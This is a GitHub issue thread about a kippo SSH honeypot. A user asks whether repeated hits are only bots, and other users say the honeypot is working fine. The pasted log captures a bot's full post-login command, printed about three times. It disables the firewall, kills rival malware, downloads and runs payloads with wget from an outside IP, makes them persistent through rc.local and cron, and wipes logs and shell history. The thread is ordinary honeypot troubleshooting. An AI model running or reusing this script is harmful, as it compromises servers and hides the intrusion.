katkad
commented
9 years ago hello, I think this is related to this one #157
= they are exec commands in quotes
Open sosdow opened 9 years ago
katkad
commented
9 years ago hello, I think this is related to this one #157
= they are exec commands in quotes
sosdow
commented
9 years ago Hi. Thanks for comment. Does this mean that attackers are launching the scripts, listed above, at my honeypot? There has been no 'normal, correct' human behavior on my honeypot
katkad
commented
9 years ago i didn't see human on my kippo in a very long time
micheloosterhof
commented
9 years ago Your honeypot is functioning fine.
Hi Running kippo for a few weeks now, on different platforms (PI, Server, VBox), but just getting approx 40 hits a day doing the same thing. Playing the log gives: pi@raspberrypi ~/kippo-master/utils $ python playlog.py ../log/tty/20141102-043357-1219.log bash: /etc/init.d/iptables: command not found pi@raspberrypi ~/kippo-master/utils $
The actual log is very long and is displayed below. Is this just bots hitting my honeypot, or is there a problem with my setup? Hitting it myself, remotely, it does exactly what I want. Any pointers appreciated. Thank you Seamus 2014-11-02 04:27:14+0000 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 122.225.97.106:32210 (192.168.1.3:2222) [session: 104] 2014-11-02 04:27:22+0000 [HoneyPotTransport,104,122.225.97.106] Remote SSH version: SSH-2.0-libssh2_1.4.2 2014-11-02 04:27:22+0000 [HoneyPotTransport,104,122.225.97.106] kex alg, key alg: diffie-hellman-group-exchange-sha1 ssh-rsa 2014-11-02 04:27:22+0000 [HoneyPotTransport,104,122.225.97.106] outgoing: aes128-ctr hmac-sha1 none 2014-11-02 04:27:22+0000 [HoneyPotTransport,104,122.225.97.106] incoming: aes128-ctr hmac-sha1 none 2014-11-02 04:27:31+0000 [HoneyPotTransport,104,122.225.97.106] NEW KEYS 2014-11-02 04:27:31+0000 [HoneyPotTransport,104,122.225.97.106] starting service ssh-userauth 2014-11-02 04:27:39+0000 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 122.225.97.106:33904 (192.168.1.3:2222) [session: 105] 2014-11-02 04:27:40+0000 [HoneyPotTransport,105,122.225.97.106] Remote SSH version: SSH-2.0-libssh2_1.4.2 2014-11-02 04:27:40+0000 [HoneyPotTransport,105,122.225.97.106] kex alg, key alg: diffie-hellman-group-exchange-sha1 ssh-rsa 2014-11-02 04:27:40+0000 [HoneyPotTransport,105,122.225.97.106] outgoing: aes128-ctr hmac-sha1 none 2014-11-02 04:27:40+0000 [HoneyPotTransport,105,122.225.97.106] incoming: aes128-ctr hmac-sha1 none 2014-11-02 04:27:42+0000 [HoneyPotTransport,105,122.225.97.106] NEW KEYS 2014-11-02 04:27:43+0000 [HoneyPotTransport,105,122.225.97.106] starting service ssh-userauth 2014-11-02 04:27:43+0000 [SSHService ssh-userauth on HoneyPotTransport,105,122.225.97.106] root trying auth none 2014-11-02 04:27:43+0000 [SSHService ssh-userauth on HoneyPotTransport,105,122.225.97.106] root trying auth password 2014-11-02 04:27:43+0000 [SSHService ssh-userauth on HoneyPotTransport,105,122.225.97.106] login attempt [root/admin] succeeded 2014-11-02 04:27:44+0000 [SSHService ssh-userauth on HoneyPotTransport,105,122.225.97.106] root authenticated with password 2014-11-02 04:27:44+0000 [SSHService ssh-userauth on HoneyPotTransport,105,122.225.97.106] starting service ssh-connection 2014-11-02 04:27:44+0000 [SSHService ssh-connection on HoneyPotTransport,105,122.225.97.106] got channel session request 2014-11-02 04:27:44+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,105,122.225.97.106] channel open 2014-11-02 04:27:44+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,105,122.225.97.106] asking for subsystem "sftp" 2014-11-02 04:27:44+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,105,122.225.97.106] {'sftp': <class twisted.conch.ssh.filetransfer.FileTransferServer at 0x17515e0>} 2014-11-02 04:29:57+0000 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 122.225.97.106:35856 (192.168.1.3:2222) [session: 106] 2014-11-02 04:29:57+0000 [SSHService ssh-userauth on HoneyPotTransport,104,122.225.97.106] root trying auth none 2014-11-02 04:29:57+0000 [HoneyPotTransport,106,122.225.97.106] Remote SSH version: SSH-2.0-libssh2_1.4.2 2014-11-02 04:29:57+0000 [HoneyPotTransport,106,122.225.97.106] kex alg, key alg: diffie-hellman-group-exchange-sha1 ssh-rsa 2014-11-02 04:29:57+0000 [HoneyPotTransport,106,122.225.97.106] outgoing: aes128-ctr hmac-sha1 none 2014-11-02 04:29:57+0000 [HoneyPotTransport,106,122.225.97.106] incoming: aes128-ctr hmac-sha1 none 2014-11-02 04:29:58+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,105,122.225.97.106] sending close 0 2014-11-02 04:29:58+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,105,122.225.97.106] remote close 2014-11-02 04:29:58+0000 [HoneyPotTransport,105,122.225.97.106] connection lost 2014-11-02 04:30:08+0000 [SSHService ssh-userauth on HoneyPotTransport,104,122.225.97.106] root trying auth password 2014-11-02 04:30:08+0000 [SSHService ssh-userauth on HoneyPotTransport,104,122.225.97.106] login attempt [root/admin] succeeded 2014-11-02 04:30:08+0000 [SSHService ssh-userauth on HoneyPotTransport,104,122.225.97.106] root authenticated with password 2014-11-02 04:30:08+0000 [SSHService ssh-userauth on HoneyPotTransport,104,122.225.97.106] starting service ssh-connection 2014-11-02 04:30:09+0000 [HoneyPotTransport,106,122.225.97.106] NEW KEYS 2014-11-02 04:30:09+0000 [SSHService ssh-connection on HoneyPotTransport,104,122.225.97.106] got channel session request 2014-11-02 04:30:09+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,104,122.225.97.106] channel open 2014-11-02 04:30:09+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,104,122.225.97.106] asking for subsystem "sftp" 2014-11-02 04:30:09+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,104,122.225.97.106] {'sftp': <class twisted.conch.ssh.filetransfer.FileTransferServer at 0x17515e0>} 2014-11-02 04:32:17+0000 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 122.225.97.106:37038 (192.168.1.3:2222) [session: 107] 2014-11-02 04:32:17+0000 [HoneyPotTransport,104,122.225.97.106] connection lost 2014-11-02 04:32:17+0000 [HoneyPotTransport,106,122.225.97.106] starting service ssh-userauth 2014-11-02 04:32:17+0000 [HoneyPotTransport,106,122.225.97.106] connection lost 2014-11-02 04:32:35+0000 [HoneyPotTransport,107,122.225.97.106] Remote SSH version: SSH-2.0-PuTTY_Release_0.63cn 2014-11-02 04:32:35+0000 [HoneyPotTransport,107,122.225.97.106] kex alg, key alg: diffie-hellman-group-exchange-sha1 ssh-rsa 2014-11-02 04:32:35+0000 [HoneyPotTransport,107,122.225.97.106] outgoing: aes256-ctr hmac-sha1 none 2014-11-02 04:32:35+0000 [HoneyPotTransport,107,122.225.97.106] incoming: aes256-ctr hmac-sha1 none 2014-11-02 04:33:52+0000 [HoneyPotTransport,107,122.225.97.106] NEW KEYS 2014-11-02 04:33:52+0000 [HoneyPotTransport,107,122.225.97.106] starting service ssh-userauth 2014-11-02 04:33:52+0000 [SSHService ssh-userauth on HoneyPotTransport,107,122.225.97.106] root trying auth none 2014-11-02 04:33:53+0000 [SSHService ssh-userauth on HoneyPotTransport,107,122.225.97.106] root trying auth keyboard-interactive 2014-11-02 04:33:53+0000 [SSHService ssh-userauth on HoneyPotTransport,107,122.225.97.106] login attempt [root/admin] succeeded 2014-11-02 04:33:53+0000 [SSHService ssh-userauth on HoneyPotTransport,107,122.225.97.106] root authenticated with keyboard-interactive 2014-11-02 04:33:53+0000 [SSHService ssh-userauth on HoneyPotTransport,107,122.225.97.106] starting service ssh-connection 2014-11-02 04:33:54+0000 [SSHService ssh-connection on HoneyPotTransport,107,122.225.97.106] got channel session request 2014-11-02 04:33:54+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,107,122.225.97.106] channel open 2014-11-02 04:33:57+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,107,122.225.97.106] executing command "/etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc;rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT killall -9 82BOT killall -9 dos64 killall -9 dos32 killall -9 new6 killall -9 new4 killall -9 node24 killall -9 mimi killall -9 nodeJR-1 killall -9 freeBSD killall -9 ksapdd killall -9 106 killall -9 09 killall -9 xsw killall -9 syslogd killall -9 skysapdd killall -9 cupsddd killall -9 ksapd killall -9 atddd killall -9 xfsdxd killall -9 sfewfesfs killall -9 gfhjrtfyhuf killall -9 rewgtf3er4t killall -9 fdsfsfvff killall -9 smarvtd killall -9 whitptabil killall -9 gdmorpen cd /etc;chattr -i 66 cd /root; chmod 7777 / etc killall -9 minerd killall -9 syn killall -9 joudckfr killall -9 www killall -9 log killall -9 .IptabLes killall -9 .IptabLex killall -9 .Mm2 killall -9 acpid killall -9 m64 killall -9 ./QQ killall -9 aabb killall -9 g3 killall -9 S99local killall -9 3 killall -9 pm killall -9 qweasd killall -9 tangtang killall -9 imap-login killall -9 xudp killall -9 sshpa killall -9 008 killall -9 txma killall -9 mrdos64.b00 killall -9 mrdos32.b00 killall -9 kkpklp killall -9 kiilp killall -9 xin1 killall -9 jibateng killall -9 syscore.sh killall -9 syscore.sh killall -9 syscore.sh killall -9 .mimeo killall -9 .mimeo killall -9 .mimeo killall -9 .mimeop killall -9 .task1 killall -9 .mimeop killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex cd /root;rm -rf dir nohup.out cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsddd. cd /etc;rm -rf dir atddd. cd /etc;rm -rf dir ksapdd. cd /etc;rm -rf dir kysapdd. cd /etc;rm -rf dir sksapdd. cd /etc;rm -rf dir skysapdd. cd /etc;rm -rf dir xfsdxd. cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsdd. cd /etc;rm -rf dir atdd. cd /etc;rm -rf dir ksapd. cd /etc;rm -rf dir kysapd. cd /etc;rm -rf dir sksapd. cd /etc;rm -rf dir skysapd. cd /etc;rm -rf dir xfsdx. cd /etc;rm -rf dir sfewfesfs cd /etc;rm -rf dir gfhjrtfyhuf cd /etc;rm -rf dir rewgtf3er4t cd /etc;rm -rf dir fdsfsfvff cd /etc;rm -rf dir smarvtd cd /etc;rm -rf dir whitptabil cd /etc;rm -rf dir gdmorpen cd /etc;rm -rf dir sfewfesfs. cd /etc;rm -rf dir gfhjrtfyhuf. cd /etc;rm -rf dir rewgtf3er4t. cd /etc;rm -rf dir fdsfsfvff. cd /etc;rm -rf dir smarvtd. cd /etc;rm -rf dir whitptabil. cd /etc;rm -rf dir gdmorpen. cd /etc;rm -rf dir nhgbhhj. cd /tmp;rm -rf dir 1. cd /tmp;rm -rf dir 2. cd /tmp;rm -rf dir 3. cd /tmp;rm -rf dir 4. cd /tmp;rm -rf dir 5. cd /tmp;rm -rf dir jdhe cd /tmp;rm -rf dir jdhe. cd /var/spool/cron; rm -rf dir root. cd /var/spool/cron; rm -rf dir root cd /var/spool/cron/crontabs; rm -rf dir root. cd /var/spool/cron/crontabs; rm -rf dir root cd /var/spool/cron ;wget -c http://219.135.56.167:9162/root cd /var/spool/cron/crontabs ;wget -c http://219.135.56.167:9162/root yes|mv /tmp/root /var/spool/cron yes|mv /tmp/root /var/spool/cron/crontabs cd /tmp;wget -c http://219.135.56.167:9162/jdhe cd /etc;wget -c http://219.135.56.167:9162/sfewfesfs cd /etc;wget -c http://219.135.56.167:9162/gfhjrtfyhuf cd /etc;wget -c http://219.135.56.167:9162/rewgtf3er4t cd /etc;wget -c http://219.135.56.167:9162/fdsfsfvff cd /etc;wget -c http://219.135.56.167:9162/smarvtd cd /etc;wget -c http://219.135.56.167:9162/whitptabil cd /etc;wget -c http://219.135.56.167:9162/gdmorpen cd /etc;wget -c http://219.135.56.167:9162/nhgbhhj cd /etc;wget -c http://219.135.56.167:9162/byv832 cd /tmp;chmod 7777 jdhe cd /etc;chmod 7777 nhgbhhj cd /etc;chmod 7777 byv832 cd /etc;chmod 7777 sfewfesfs cd /etc;chmod 7777 gfhjrtfyhuf cd /etc;chmod 7777 rewgtf3er4t cd /etc;chmod 7777 fdsfsfvff cd /etc;chmod 7777 smarvtd cd /etc;chmod 7777 whitptabil cd /etc;chmod 7777 gdmorpen cd /tmp;chmod 7777 nhgbhhj cd /tmp;chmod 7777 byv832 cd /tmp;chmod 7777 sfewfesfs cd /tmp;chmod 7777 gfhjrtfyhuf cd /tmp;chmod 7777 rewgtf3er4t cd /tmp;chmod 7777 fdsfsfvff cd /tmp;chmod 7777 smarvtd cd /tmp;chmod 7777 whitptabil cd /tmp;chmod 7777 gdmorpen cd /tmp;./jdhe nohup /etc/sfewfesfs > /dev/null 2>&1& nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& nohup /etc/rewgtf3er4t > /dev/null 2>&1& nohup /etc/fdsfsfvff > /dev/null 2>&1& nohup /etc/smarvtd > /dev/null 2>&1& nohup /etc/whitptabil > /dev/null 2>&1& nohup /etc/gdmorpen > /dev/null 2>&1& nohup /etc/nhgbhhj > /dev/null 2>&1& nohup /etc/byv832 > /dev/null 2>&1& nohup /tmp/sfewfesfs > /dev/null 2>&1& nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& nohup /tmp/rewgtf3er4t > /dev/null 2>&1& nohup /tmp/fdsfsfvff > /dev/null 2>&1& nohup /tmp/smarvtd > /dev/null 2>&1& nohup /tmp/whitptabil > /dev/null 2>&1& nohup /tmp/gdmorpen > /dev/null 2>&1& nohup /tmp/nhgbhhj > /dev/null 2>&1& nohup /tmp/byv832 > /dev/null 2>&1& echo "cd /tmp;./sfewfesfs" >> /etc/rc.local echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local echo "cd /tmp;./smarvtd" >> /etc/rc.local echo "cd /tmp;./whitptabil" >> /etc/rc.local echo "cd /tmp;./gdmorpen" >> /etc/rc.local echo "cd /etc;./sfewfesfs" >> /etc/rc.local echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local echo "cd /etc;./fdsfsfvff" >> /etc/rc.local echo "cd /etc;./smarvtd" >> /etc/rc.local echo "cd /etc;./whitptabil" >> /etc/rc.local echo "cd /etc;./gdmorpen" >> /etc/rc.local echo "unset MAILCHECK" >> /etc/profile cd /etc;chattr +i sfewfesfs rm -rf /root/.bash_history touch /root/.bash_history history -r cd /var/log > dmesg cd /var/log > auth.log cd /var/log > alternatives.log cd /var/log > boot.log cd /var/log > btmp cd /var/log > cron cd /var/log > cups cd /var/log > daemon.log cd /var/log > dpkg.log cd /var/log > faillog cd /var/log > kern.log cd /var/log > lastlog cd /var/log > maillog cd /var/log > user.log cd /var/log > Xorg.x.log cd /var/log > anaconda.log cd /var/log > yum.log cd /var/log > secure cd /var/log > wtmp cd /var/log > utmp cd /var/log > messages cd /var/log > spooler cd /var/log > sudolog cd /var/log > aculog cd /var/log > access-log cd /root > .bash_history history -c " 2014-11-02 04:33:57+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,107,122.225.97.106] exec command: "/etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc;rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT killall -9 82BOT killall -9 dos64 killall -9 dos32 killall -9 new6 killall -9 new4 killall -9 node24 killall -9 mimi killall -9 nodeJR-1 killall -9 freeBSD killall -9 ksapdd killall -9 106 killall -9 09 killall -9 xsw killall -9 syslogd killall -9 skysapdd killall -9 cupsddd killall -9 ksapd killall -9 atddd killall -9 xfsdxd killall -9 sfewfesfs killall -9 gfhjrtfyhuf killall -9 rewgtf3er4t killall -9 fdsfsfvff killall -9 smarvtd killall -9 whitptabil killall -9 gdmorpen cd /etc;chattr -i 66 cd /root; chmod 7777 / etc killall -9 minerd killall -9 syn killall -9 joudckfr killall -9 www killall -9 log killall -9 .IptabLes killall -9 .IptabLex killall -9 .Mm2 killall -9 acpid killall -9 m64 killall -9 ./QQ killall -9 aabb killall -9 g3 killall -9 S99local killall -9 3 killall -9 pm killall -9 qweasd killall -9 tangtang killall -9 imap-login killall -9 xudp killall -9 sshpa killall -9 008 killall -9 txma killall -9 mrdos64.b00 killall -9 mrdos32.b00 killall -9 kkpklp killall -9 kiilp killall -9 xin1 killall -9 jibateng killall -9 syscore.sh killall -9 syscore.sh killall -9 syscore.sh killall -9 .mimeo killall -9 .mimeo killall -9 .mimeo killall -9 .mimeop killall -9 .task1 killall -9 .mimeop killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex cd /root;rm -rf dir nohup.out cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsddd. cd /etc;rm -rf dir atddd. cd /etc;rm -rf dir ksapdd. cd /etc;rm -rf dir kysapdd. cd /etc;rm -rf dir sksapdd. cd /etc;rm -rf dir skysapdd. cd /etc;rm -rf dir xfsdxd. cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsdd. cd /etc;rm -rf dir atdd. cd /etc;rm -rf dir ksapd. cd /etc;rm -rf dir kysapd. cd /etc;rm -rf dir sksapd. cd /etc;rm -rf dir skysapd. cd /etc;rm -rf dir xfsdx. cd /etc;rm -rf dir sfewfesfs cd /etc;rm -rf dir gfhjrtfyhuf cd /etc;rm -rf dir rewgtf3er4t cd /etc;rm -rf dir fdsfsfvff cd /etc;rm -rf dir smarvtd cd /etc;rm -rf dir whitptabil cd /etc;rm -rf dir gdmorpen cd /etc;rm -rf dir sfewfesfs. cd /etc;rm -rf dir gfhjrtfyhuf. cd /etc;rm -rf dir rewgtf3er4t. cd /etc;rm -rf dir fdsfsfvff. cd /etc;rm -rf dir smarvtd. cd /etc;rm -rf dir whitptabil. cd /etc;rm -rf dir gdmorpen. cd /etc;rm -rf dir nhgbhhj. cd /tmp;rm -rf dir 1. cd /tmp;rm -rf dir 2. cd /tmp;rm -rf dir 3. cd /tmp;rm -rf dir 4. cd /tmp;rm -rf dir 5. cd /tmp;rm -rf dir jdhe cd /tmp;rm -rf dir jdhe. cd /var/spool/cron; rm -rf dir root. cd /var/spool/cron; rm -rf dir root cd /var/spool/cron/crontabs; rm -rf dir root. cd /var/spool/cron/crontabs; rm -rf dir root cd /var/spool/cron ;wget -c http://219.135.56.167:9162/root cd /var/spool/cron/crontabs ;wget -c http://219.135.56.167:9162/root yes|mv /tmp/root /var/spool/cron yes|mv /tmp/root /var/spool/cron/crontabs cd /tmp;wget -c http://219.135.56.167:9162/jdhe cd /etc;wget -c http://219.135.56.167:9162/sfewfesfs cd /etc;wget -c http://219.135.56.167:9162/gfhjrtfyhuf cd /etc;wget -c http://219.135.56.167:9162/rewgtf3er4t cd /etc;wget -c http://219.135.56.167:9162/fdsfsfvff cd /etc;wget -c http://219.135.56.167:9162/smarvtd cd /etc;wget -c http://219.135.56.167:9162/whitptabil cd /etc;wget -c http://219.135.56.167:9162/gdmorpen cd /etc;wget -c http://219.135.56.167:9162/nhgbhhj cd /etc;wget -c http://219.135.56.167:9162/byv832 cd /tmp;chmod 7777 jdhe cd /etc;chmod 7777 nhgbhhj cd /etc;chmod 7777 byv832 cd /etc;chmod 7777 sfewfesfs cd /etc;chmod 7777 gfhjrtfyhuf cd /etc;chmod 7777 rewgtf3er4t cd /etc;chmod 7777 fdsfsfvff cd /etc;chmod 7777 smarvtd cd /etc;chmod 7777 whitptabil cd /etc;chmod 7777 gdmorpen cd /tmp;chmod 7777 nhgbhhj cd /tmp;chmod 7777 byv832 cd /tmp;chmod 7777 sfewfesfs cd /tmp;chmod 7777 gfhjrtfyhuf cd /tmp;chmod 7777 rewgtf3er4t cd /tmp;chmod 7777 fdsfsfvff cd /tmp;chmod 7777 smarvtd cd /tmp;chmod 7777 whitptabil cd /tmp;chmod 7777 gdmorpen cd /tmp;./jdhe nohup /etc/sfewfesfs > /dev/null 2>&1& nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& nohup /etc/rewgtf3er4t > /dev/null 2>&1& nohup /etc/fdsfsfvff > /dev/null 2>&1& nohup /etc/smarvtd > /dev/null 2>&1& nohup /etc/whitptabil > /dev/null 2>&1& nohup /etc/gdmorpen > /dev/null 2>&1& nohup /etc/nhgbhhj > /dev/null 2>&1& nohup /etc/byv832 > /dev/null 2>&1& nohup /tmp/sfewfesfs > /dev/null 2>&1& nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& nohup /tmp/rewgtf3er4t > /dev/null 2>&1& nohup /tmp/fdsfsfvff > /dev/null 2>&1& nohup /tmp/smarvtd > /dev/null 2>&1& nohup /tmp/whitptabil > /dev/null 2>&1& nohup /tmp/gdmorpen > /dev/null 2>&1& nohup /tmp/nhgbhhj > /dev/null 2>&1& nohup /tmp/byv832 > /dev/null 2>&1& echo "cd /tmp;./sfewfesfs" >> /etc/rc.local echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local echo "cd /tmp;./smarvtd" >> /etc/rc.local echo "cd /tmp;./whitptabil" >> /etc/rc.local echo "cd /tmp;./gdmorpen" >> /etc/rc.local echo "cd /etc;./sfewfesfs" >> /etc/rc.local echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local echo "cd /etc;./fdsfsfvff" >> /etc/rc.local echo "cd /etc;./smarvtd" >> /etc/rc.local echo "cd /etc;./whitptabil" >> /etc/rc.local echo "cd /etc;./gdmorpen" >> /etc/rc.local echo "unset MAILCHECK" >> /etc/profile cd /etc;chattr +i sfewfesfs rm -rf /root/.bash_history touch /root/.bash_history history -r cd /var/log > dmesg cd /var/log > auth.log cd /var/log > alternatives.log cd /var/log > boot.log cd /var/log > btmp cd /var/log > cron cd /var/log > cups cd /var/log > daemon.log cd /var/log > dpkg.log cd /var/log > faillog cd /var/log > kern.log cd /var/log > lastlog cd /var/log > maillog cd /var/log > user.log cd /var/log > Xorg.x.log cd /var/log > anaconda.log cd /var/log > yum.log cd /var/log > secure cd /var/log > wtmp cd /var/log > utmp cd /var/log > messages cd /var/log > spooler cd /var/log > sudolog cd /var/log > aculog cd /var/log > access-log cd /root > .bash_history history -c " 2014-11-02 04:33:57+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,107,122.225.97.106] Opening TTY log: log/tty/20141102-043357-1219.log 2014-11-02 04:36:10+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,107,122.225.97.106] Running exec command "/etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc;rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT killall -9 82BOT killall -9 dos64 killall -9 dos32 killall -9 new6 killall -9 new4 killall -9 node24 killall -9 mimi killall -9 nodeJR-1 killall -9 freeBSD killall -9 ksapdd killall -9 106 killall -9 09 killall -9 xsw killall -9 syslogd killall -9 skysapdd killall -9 cupsddd killall -9 ksapd killall -9 atddd killall -9 xfsdxd killall -9 sfewfesfs killall -9 gfhjrtfyhuf killall -9 rewgtf3er4t killall -9 fdsfsfvff killall -9 smarvtd killall -9 whitptabil killall -9 gdmorpen cd /etc;chattr -i 66 cd /root; chmod 7777 / etc killall -9 minerd killall -9 syn killall -9 joudckfr killall -9 www killall -9 log killall -9 .IptabLes killall -9 .IptabLex killall -9 .Mm2 killall -9 acpid killall -9 m64 killall -9 ./QQ killall -9 aabb killall -9 g3 killall -9 S99local killall -9 3 killall -9 pm killall -9 qweasd killall -9 tangtang killall -9 imap-login killall -9 xudp killall -9 sshpa killall -9 008 killall -9 txma killall -9 mrdos64.b00 killall -9 mrdos32.b00 killall -9 kkpklp killall -9 kiilp killall -9 xin1 killall -9 jibateng killall -9 syscore.sh killall -9 syscore.sh killall -9 syscore.sh killall -9 .mimeo killall -9 .mimeo killall -9 .mimeo killall -9 .mimeop killall -9 .task1 killall -9 .mimeop killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex cd /root;rm -rf dir nohup.out cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsddd. cd /etc;rm -rf dir atddd. cd /etc;rm -rf dir ksapdd. cd /etc;rm -rf dir kysapdd. cd /etc;rm -rf dir sksapdd. cd /etc;rm -rf dir skysapdd. cd /etc;rm -rf dir xfsdxd. cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsdd. cd /etc;rm -rf dir atdd. cd /etc;rm -rf dir ksapd. cd /etc;rm -rf dir kysapd. cd /etc;rm -rf dir sksapd. cd /etc;rm -rf dir skysapd. cd /etc;rm -rf dir xfsdx. cd /etc;rm -rf dir sfewfesfs cd /etc;rm -rf dir gfhjrtfyhuf cd /etc;rm -rf dir rewgtf3er4t cd /etc;rm -rf dir fdsfsfvff cd /etc;rm -rf dir smarvtd cd /etc;rm -rf dir whitptabil cd /etc;rm -rf dir gdmorpen cd /etc;rm -rf dir sfewfesfs. cd /etc;rm -rf dir gfhjrtfyhuf. cd /etc;rm -rf dir rewgtf3er4t. cd /etc;rm -rf dir fdsfsfvff. cd /etc;rm -rf dir smarvtd. cd /etc;rm -rf dir whitptabil. cd /etc;rm -rf dir gdmorpen. cd /etc;rm -rf dir nhgbhhj. cd /tmp;rm -rf dir 1. cd /tmp;rm -rf dir 2. cd /tmp;rm -rf dir 3. cd /tmp;rm -rf dir 4. cd /tmp;rm -rf dir 5. cd /tmp;rm -rf dir jdhe cd /tmp;rm -rf dir jdhe. cd /var/spool/cron; rm -rf dir root. cd /var/spool/cron; rm -rf dir root cd /var/spool/cron/crontabs; rm -rf dir root. cd /var/spool/cron/crontabs; rm -rf dir root cd /var/spool/cron ;wget -c http://219.135.56.167:9162/root cd /var/spool/cron/crontabs ;wget -c http://219.135.56.167:9162/root yes|mv /tmp/root /var/spool/cron yes|mv /tmp/root /var/spool/cron/crontabs cd /tmp;wget -c http://219.135.56.167:9162/jdhe cd /etc;wget -c http://219.135.56.167:9162/sfewfesfs cd /etc;wget -c http://219.135.56.167:9162/gfhjrtfyhuf cd /etc;wget -c http://219.135.56.167:9162/rewgtf3er4t cd /etc;wget -c http://219.135.56.167:9162/fdsfsfvff cd /etc;wget -c http://219.135.56.167:9162/smarvtd cd /etc;wget -c http://219.135.56.167:9162/whitptabil cd /etc;wget -c http://219.135.56.167:9162/gdmorpen cd /etc;wget -c http://219.135.56.167:9162/nhgbhhj cd /etc;wget -c http://219.135.56.167:9162/byv832 cd /tmp;chmod 7777 jdhe cd /etc;chmod 7777 nhgbhhj cd /etc;chmod 7777 byv832 cd /etc;chmod 7777 sfewfesfs cd /etc;chmod 7777 gfhjrtfyhuf cd /etc;chmod 7777 rewgtf3er4t cd /etc;chmod 7777 fdsfsfvff cd /etc;chmod 7777 smarvtd cd /etc;chmod 7777 whitptabil cd /etc;chmod 7777 gdmorpen cd /tmp;chmod 7777 nhgbhhj cd /tmp;chmod 7777 byv832 cd /tmp;chmod 7777 sfewfesfs cd /tmp;chmod 7777 gfhjrtfyhuf cd /tmp;chmod 7777 rewgtf3er4t cd /tmp;chmod 7777 fdsfsfvff cd /tmp;chmod 7777 smarvtd cd /tmp;chmod 7777 whitptabil cd /tmp;chmod 7777 gdmorpen cd /tmp;./jdhe nohup /etc/sfewfesfs > /dev/null 2>&1& nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& nohup /etc/rewgtf3er4t > /dev/null 2>&1& nohup /etc/fdsfsfvff > /dev/null 2>&1& nohup /etc/smarvtd > /dev/null 2>&1& nohup /etc/whitptabil > /dev/null 2>&1& nohup /etc/gdmorpen > /dev/null 2>&1& nohup /etc/nhgbhhj > /dev/null 2>&1& nohup /etc/byv832 > /dev/null 2>&1& nohup /tmp/sfewfesfs > /dev/null 2>&1& nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& nohup /tmp/rewgtf3er4t > /dev/null 2>&1& nohup /tmp/fdsfsfvff > /dev/null 2>&1& nohup /tmp/smarvtd > /dev/null 2>&1& nohup /tmp/whitptabil > /dev/null 2>&1& nohup /tmp/gdmorpen > /dev/null 